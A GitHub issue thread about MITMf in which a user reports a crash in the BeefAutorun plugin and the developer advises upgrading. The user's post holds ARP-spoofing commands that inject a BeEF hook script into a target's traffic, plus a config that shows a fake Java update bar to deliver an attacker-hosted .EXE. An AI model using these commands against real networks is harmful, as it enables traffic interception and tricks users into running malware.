### ISSUE TITLE
Problem with beefauto plugin

### ISSUE THREAD

**Issue by cptobvious1** [byt3bl33d3r/MITMf#179]
Hi byte,

Sorry to disturb you with this question but I've hit kind of a wall here. I'm trying to use the beefauto plugin so that I've don't have to do anything manually in beef and look everytime whene a browser is hooked but it won't start the plugin.
The error message that I get is the following:
[*] MITMf v0.9.7 online... initializing plugins
|_ Inject v0.3
|_ BeEFAutorun v0.3
Traceback (most recent call last):
  File "./mitmf.py", line 136, in <module>
    p.initialize(args)
  File "/usr/share/mitmf/plugins/BeefAutorun.py", line 46, in initialize
    self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))
AttributeError: 'BeefAutorun' object has no attribute 'tree_output'

I've tried with the following commands:
mitmf -i eth0 -c config/mitmf_beef.conf --spoof --arp --gateway=192.168.0.1 --target=192.168.0.42 --beefauto --inject --js-url=http://192.168.0.37:3000/hook.js
mitmf -i eth0 -c config/mitmf_beef.conf --spoof --arp --gateway=192.168.0.1 --target=192.168.0.42 --beefauto

With the last command  I don't start the beef framework and then started it but it was still the same error.
I chanched the beefip in the config file to the ip-adres of my eth0:
#Required BeEF and Metasploit options
        [[BeEF]]
                beefip = 192.168.0.37
                beefport = 3000
                user = beef
                pass = beef

Then I chanched some parameters in the beefautorun:
I commented out everything  except this and chanched it to my attack vectors:
[BeEFAutorun]
        mode = oneshot

                [[[Windows 7]]]  #Target only Windows 7 using Chrome

                        [[[[C]]]]
                                #'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}'
                                'Fake Notification Bar (Chrome)' = '{"url": "http://192.168.0.37/JavaUpdate8r54.EXE", "notification_text": "Your version of java is out of date."}'

If I deleted the --beefauto then the --inject --js-url=...
goes just fine.
But the --beefauto wont load.

Can you tell me What I'm doing wrong?
Thanks by forehand.

Kind regards.

**Comment by byt3bl33d3r** [comment]
@cptobvious1 you're using an old version of the framework , see https://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug. 

Please install the current version from github , I will be updating the framework with a new version of the BeefAutorun plugin soon
